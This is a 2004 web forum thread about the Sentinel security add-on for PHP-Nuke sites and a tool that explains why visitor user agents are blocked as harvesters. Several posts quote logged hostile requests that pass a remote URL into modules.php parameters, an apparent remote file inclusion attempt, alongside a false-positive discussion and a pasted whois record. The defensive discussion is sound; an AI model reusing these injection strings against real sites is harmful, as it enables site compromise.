| Author |
Message |
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
 Posted:
Fri Jun 25, 2004 7:42 am |
|
Sentinel traps various harvesters by examining the browser agent that is being used/forged. The list of harvesters is available and maintainable through the Sentinel™ administration panel. It is not always readily apparent why a particular agent gets flagged. There is now a module called Only registered users can see links on this board! Get registered or login! under my Site Navigation menu. Whenever you need an explanation as to what harvester entry trapped the agent that is in the email that Sentinel™ sent you, just use this utility.
Let me know if you find bugs or think it needs enhancing. |
| |
|
|
|
Salieri
Hangin' Around
Joined: Nov 07, 2003
Posts: 33
|
| Posted:
Fri Jun 25, 2004 8:36 am |
|
Has this feature been implemented in the Sentinal packages?
Sounds great.  |
| |
|
|
|
|
Raven
|
| Posted:
Fri Jun 25, 2004 8:40 am |
|
In the next release (v2.0) the Agent that trapped it will be included in the Email. |
| |
|
|
|
|
squiresmk
Regular
Joined: May 31, 2004
Posts: 95
Location: NY
|
| Posted:
Fri Jun 25, 2004 9:04 am |
|
Sentinel 2.0 is looking extremely awesome.
"There is no obvious match for ==> an obvious match.
If you haven't already, please post the contents of the email you received in one of the Sentinel™ forums." |
_________________
Captain of the Internet Debate Team. |
|
  
  |
|
dean
Worker
Joined: Apr 14, 2004
Posts: 193
|
| Posted:
Fri Jun 25, 2004 9:55 pm |
|
Received this notification and no obvious conclusion was provided by the new Explainer:
Date & Time: 2004-06-25 05:19:52
Blocked IP: 217.160.129.159
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: curl/7.7.1 (i686-suse-linux) libcurl 7.7.1 (SSL 0.9.6) (ipv6 enabled)
Query String: alaskandog.com/ipw-web/portal/cms/modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&album=http://217.59.104.226/&cat=http://217.59.104.226/&pos=http://217.59.104.226/
Forwarded For: none
Client IP: none
Remote Address: 217.160.129.159
Remote Port: 37942
Request Method: GET |
| |
|
|
|
|
xfsunolesphp
Regular
Joined: Aug 23, 2003
Posts: 77
|
| Posted:
Fri Jun 25, 2004 10:07 pm |
|
it appear, it trying to hack your site in bad way. |
| |
|
|
|
|
sharlein
Member Emeritus
Joined: Nov 19, 2002
Posts: 322
Location: On the Road
|
| Posted:
Fri Jun 25, 2004 10:11 pm |
|
Would this be considered a False Positive (using Agent Inspector):Code:Agent: User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Cox High Speed Internet Customer) is trapped by this Harvester entry: custo
|
Thanks, Steve |
_________________
Give Me Ambiguity Or Give Me Something Else! |
|
|
|
|
sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2496
|
| Posted:
Fri Jun 25, 2004 10:17 pm |
|
Yep would be best to remove custo from the list until we can figure out a way to catch it without killing of every user agent with customer or custom in it. |
_________________
[b][size=5]openSUSE 11.4-x86 | Linux 2.6.37.1-1.2desktop i686 | KDE: 4.6.41>=4.7 | XFCE 4.8 | AMD Athlon(tm) XP 3000+ | MSI K7N2 Delta-L | 3GB Black Diamond DDR
| GeForce 6200@433Mhz 512MB | Xorg 1.9.3 | NVIDIA 270.30[/size:2b8 |
|
|
|
|
sharlein
|
| Posted:
Fri Jun 25, 2004 10:30 pm |
|
|
|
|
|
BobMarion
Former Admin in Good Standing
Joined: Oct 30, 2002
Posts: 1037
Location: RedNeck Land (known as Kentucky)
|
| Posted:
Fri Jun 25, 2004 10:31 pm |
|
The email above shows that there was a trip in the "Filter" blocker. This is done when someone tries to pass http://whatever.tld thru the name variable. Had it not been tripped by a true hack it would have been tripped by the "libcurl" harvester list string match. |
_________________
Bob Marion
Codito Ergo Sum
Only registered users can see links on this board! Get registered or login! |
|
|
|
sharlein
|
| Posted:
Fri Jun 25, 2004 10:55 pm |
|
That IP listed above appears to be trying to hack a lot of Nuke sites. They tried mine, but Sentinel caught them. Excellent work! Thank you |
| |
|
|
|
|
Himmel
Regular
Joined: May 08, 2004
Posts: 77
|
| Posted:
Sat Jun 26, 2004 4:30 am |
|
Offtopic..same ip here...Sentinel saved my website!
Ontopic: Thx Raven for your agent inspector..its great and easy to use.
Cant wait for 2.0.  |
| |
|
|
|
|
GanjaUK
Life Cycles Becoming CPU Cycles
Joined: Feb 14, 2004
Posts: 633
Location: England
|
| Posted:
Sat Jun 26, 2004 8:35 am |
|
I got some "abuse" blocked yesterday, same IP again.
Code:
modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&sid=http://217.59.104.226/
|
We must all have places in some script kiddies little black book.  |
_________________
Only registered users can see links on this board! Get registered or login! |
|
|
|
|
bretonmage
Hangin' Around
Joined: Mar 30, 2004
Posts: 34
|
| Posted:
Sat Jun 26, 2004 9:29 am |
|
Yep, even I've got the same hack attempt:
Code:modules.php?name=http://217.59.104.226/&page=http://217.59.104.226/
modules.php?name=http://217.59.104.226/&pa=http://217.59.104.226/&pid=http://217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&p=http%3A//217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&meta=http%3A//217.59.104.226/&cat=http%3A//217.59.104.226/&pos=http%3A//217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&album=http%3A//217.59.104.226/&pos=http%3A//217.59.104.226/
|
All in all, I have around 20 of the same hack attempt with that IP. |
| |
|
|
|
|
SmackDaddy
Involved
Joined: Jun 02, 2004
Posts: 268
Location: Englewood, OH
|
| Posted:
Sun Jun 27, 2004 11:42 pm |
|
| Raven wrote: | | In the next release (v2.0) the Agent that trapped it will be included in the Email. |
So with this being the case, what you are saying is that your Agent Inspector won't be a block you'll need to be releasing, correct?
And I see according to Bob's site, that 2.0 is *TENTATIVELY* due out in a week or so (July 4th-ish).....so that's good! Thanks for the dedication and efforts of the Sentinel Crew! |
| |
|
|
|
|
Raven
|
| Posted:
Mon Jun 28, 2004 4:02 am |
|
That is correct. In v2.0 you should see the Reason more clearly defined in the Admin email. |
| |
|
|
|
|
ConViCT
New Member
Joined: Oct 18, 2002
Posts: 21
|
| Posted:
Wed Jul 07, 2004 1:30 pm |
|
I am getting a different Agent -Abuse email, here is where it is pointing to:
mydomain.com/modules.php?name=News&file=article&sid=287&mode=&order=0&thold=0
It is blocking people, but the utility doesn't explain why....
Any ideas?
Thanks,
ConViCt
EDIT NOTE: I use the same string and do not get banned, but poeple outside are? |
| |
|
|
|
|
Raven
|
| Posted:
Wed Jul 07, 2004 1:41 pm |
|
Please post the actual top content of your email but just mask your domain, like thisCode:Date & Time: 2004-06-25 05:19:52
Blocked IP: 217.160.129.159
User ID: Anonymous (1)
Reason: Agent
--------------------
Agent: User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Cox High Speed Internet Customer)
Forwarded For: none
Client IP: none
Remote Address: 217.160.129.159
Remote Port: 37942
Request Method: GET
|
|
| |
|
|
|
|
ConViCT
|
| Posted:
Wed Jul 07, 2004 1:45 pm |
|
Doh! Sorry about that, here it is:
Date & Time: 2004-07-07 12:11:46
Blocked IP: 68.13.204.14
User ID: Anonymous (1)
Reason: Abuse - AGENT
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer)
Query String: www.convictradio.com/modules.php?name=News&file=article&sid=287&mode=&order=0&thold=0
Forwarded For: none
Client IP: none
Remote Address: 68.13.204.14
Remote Port: 1831
Request Method: GET
--------------------
Who-Is for IP
OrgName: Cox Communications Inc.
OrgID: CXA
Address: 1400 Lake Hearn Drive
City: Atlanta
StateProv: GA
PostalCode: 30319
Country: US
NetRange: 68.0.0.0 - 68.15.255.255
CIDR: 68.0.0.0/12
NetName: COX-ATLANTA
NetHandle: NET-68-0-0-0-1
Parent: NET-68-0-0-0-0
NetType: Direct Allocation
NameServer: NS.COX.NET
NameServer: NS.WEST.COX.NET
NameServer: NS.EAST.COX.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2001-11-12
Updated: 2002-08-21
TechHandle: IC146-ARIN
TechName: Cox Communications, Inc
TechPhone: +1-404-269-7626
TechEmail: abuse@cox.net
OrgAbuseHandle: IC146-ARIN
OrgAbuseName: Cox Communications, Inc
OrgAbusePhone: +1-404-269-7626
OrgAbuseEmail: abuse@cox.net
OrgTechHandle: WILLI-ARIN
OrgTechName: Williams, Matt
OrgTechPhone: +1-404-269-7626
OrgTechEmail: matt.williams@cox.com
Thanks,
ConViCt |
| |
|
|
|
|
Raven
|
| Posted:
Wed Jul 07, 2004 2:01 pm |
|
Try using the Agent Inspector on that Agent string. That will tell you why  |
| |
|
|
|
|
ConViCT
|
| Posted:
Wed Jul 07, 2004 2:11 pm |
|
|
|
|
|
Raven
|
| Posted:
Wed Jul 07, 2004 2:20 pm |
|
No, the USER AGENT string  
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer) |
| |
|
|
|
|
ConViCT
|
| Posted:
Wed Jul 07, 2004 2:26 pm |
|
Ahhhhhhhh! 
Thanks Raven!
But what does:Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer) is trapped by this Harvester entry: custo mean?
custo?
Huh?
Thanks so much for your help! |
| |
|
|
|
|
ConViCT
|
| Posted:
Wed Jul 07, 2004 2:28 pm |
|
Something else I just noticed....every single block by Sentinel has come from Cox.net... |
| |
|
|
|
|
ConViCT
|
| Posted:
Wed Jul 07, 2004 2:34 pm |
|
Never mind figured it out! Noticed in another post that Custo shoud be removed from the harvester list!
Thanks so much Raven, You Rock!
ConViCt |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
